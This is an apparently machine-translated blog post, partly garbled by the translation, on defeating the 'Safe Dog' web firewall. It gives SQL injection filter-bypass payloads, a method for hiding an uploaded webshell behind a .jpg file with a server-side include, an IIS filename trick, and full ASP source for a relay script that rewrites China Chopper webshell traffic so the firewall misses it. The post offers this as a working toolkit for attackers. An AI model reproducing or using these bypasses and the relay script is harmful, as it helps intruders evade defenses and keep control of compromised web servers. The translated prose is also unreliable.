What are the main aspects of a safe dog:
1. Over-injection
2. Oversized horses are blocked to visit
3. Over chopper connection A word was intercepted
4. Over 1.asp;. JPG such a file
I haven't met any of the others.
Now at 1.1 o ' Talk:
1. Over-injection
Method One: A.asp?aaa=%00&id=sql statement
Method Two: A.asp?id=sql statement inside the security filter to add a%l such as: un%aion sel%aect 1,2,3,4 fr%aom Admin
2. Oversized horses are blocked to visit
Method One: Upload a big horse and then visit http://sss.com/dama.asp; Interception occurs after the visit.
Then the solution first dama.asp renamed Dama.jpg Upload, and then upload files in the same directory da.asp content: <!--#include file= "dama.jpg"-so again visit da.asp will not be intercepted.
3. Over chopper connection A word was intercepted
Method One: Do not use the kitchen knife to connect a word, with another sentence to connect the end.
Method Two: Connect the chopper under the relay, replace the filtered words.
4. Over 1.asp;. JPG such as file interception
Method one: 1.asp;. Jpg
Method Two: Secrecy
Specifically for everyone summed up so much, safe dog anyway basically can ignore!!
What else to add can be sent below!
The following script is the use of a safe dog connection chopper: First put the script into an executable. asp directory
And then visit http://www.hack70.cn/asf.asp?dz=, the Webshell address you're going to have.
Then enter the address into the chopper password or the one you want to Webshell. The type of the password is also the choice of the word trojan suffix type
Example: http://www.hack70.cn/asf.asp?dz=http://xxx.com/yijuhua.php password
So input on the chopper
This script temporarily supports. php. aspx for a word connection. The ASP may not yet have been tested. If anyone has a safe dog, Webshell can tell me. I'll test it again to make this script modification fully supported!
<%
' The principle of Rao, grasping the chopper to connect the Webshell bag and then study the security dog filter which keyword relay to replace those keywords to filter out!
Jmstr=replace (Request.Form, "$_post", "$_request")
Jmstr=replace (Jmstr, "->|", "-->|")
Jmstr=replace (Jmstr, "@eval (", "@eval (")
Jmstr=replace (Jmstr, "System.Convert.FromBase64String", "System.Convert". FromBase64String ")
Jmurl=request ("DZ")
Response.Write Request ("DZ")
Jmref=jmurl
Jmcok= ""
' Ghost Brother
' Chopper break safe dog Connection!
' Www.hack70.cn
Response.Write PostData (JMURL,JMSTR,JMCOK,JMREF)
Function PostData (POSTURL,POSTSTR,POSTCOK,POSTREF)
Dim Http
Set Http = Server.CreateObject ("Msxml2.serverxmlhttp")
With Http
. Open "POST", Posturl,false
. setRequestHeader "Content-length", Len (POSTSTR)
. setRequestHeader "Content-type", "application/x-www-form-urlencoded"
. setRequestHeader "Referer", Postref
‘. setRequestHeader "Cookie", Postcok
. Send Poststr
PostData =. Responsebody
End with
Set Http = Nothing
PostData =bytes2bstr (postdata)
End Function
Function Bytes2bstr (vIn)
Dim Strreturn
Dim I, Thischarcode, Nextcharcode
Strreturn = ""
For I = 1 to LenB (vIn)
Thischarcode = AscB (MidB (VIn, I, 1))
If Thischarcode < &h80 Then
Strreturn = Strreturn & Chr (Thischarcode)
Else
Nextcharcode = AscB (MidB (vIn, I + 1, 1))
Strreturn = Strreturn & Chr (CLng (thischarcode) * &h100 + CInt (nextcharcode))
i = i + 1
End If
Next
Bytes2bstr = Strreturn
End Function
Function urlencoding (Vstrin)
Strreturn= ""
Dim I
For I=1 to Len (Vstrin)
Thischr=mid (vstrin,i,1)
If Abs (ASC (THISCHR)) < &HFF Then
Strreturn=strreturn & THISCHR
Else
INNERCODE=ASC (THISCHR)
If Innercode<0 Then
Innercode=innercode + &h10000
End If
Hight1= (Innercode and &HFF00) \&hff
Low1=innercode and &hff
Strreturn=strreturn & "%" & Hex (Hight1) & "%" & Hex (LOW1)
End if
Next
Strreturn=replace (STRRETURN,CHR (32), "%20") ' Convert spaces, if the site filters spaces, try to replace%20 with/**/
Strreturn=replace (STRRETURN,CHR), "%2b") ' JMDCW increase conversion + character
' Strreturn=replace (Strreturn, filter character, "Convert to Character") ' here to add code to filter
Urlencoding=strreturn
End Function
%>
This article is from "My World, I am the director." "Blog, be sure to keep this provenance http://biock.blog.51cto.com/4643304/1643919
A summary of the experience of killing safe dogs in seconds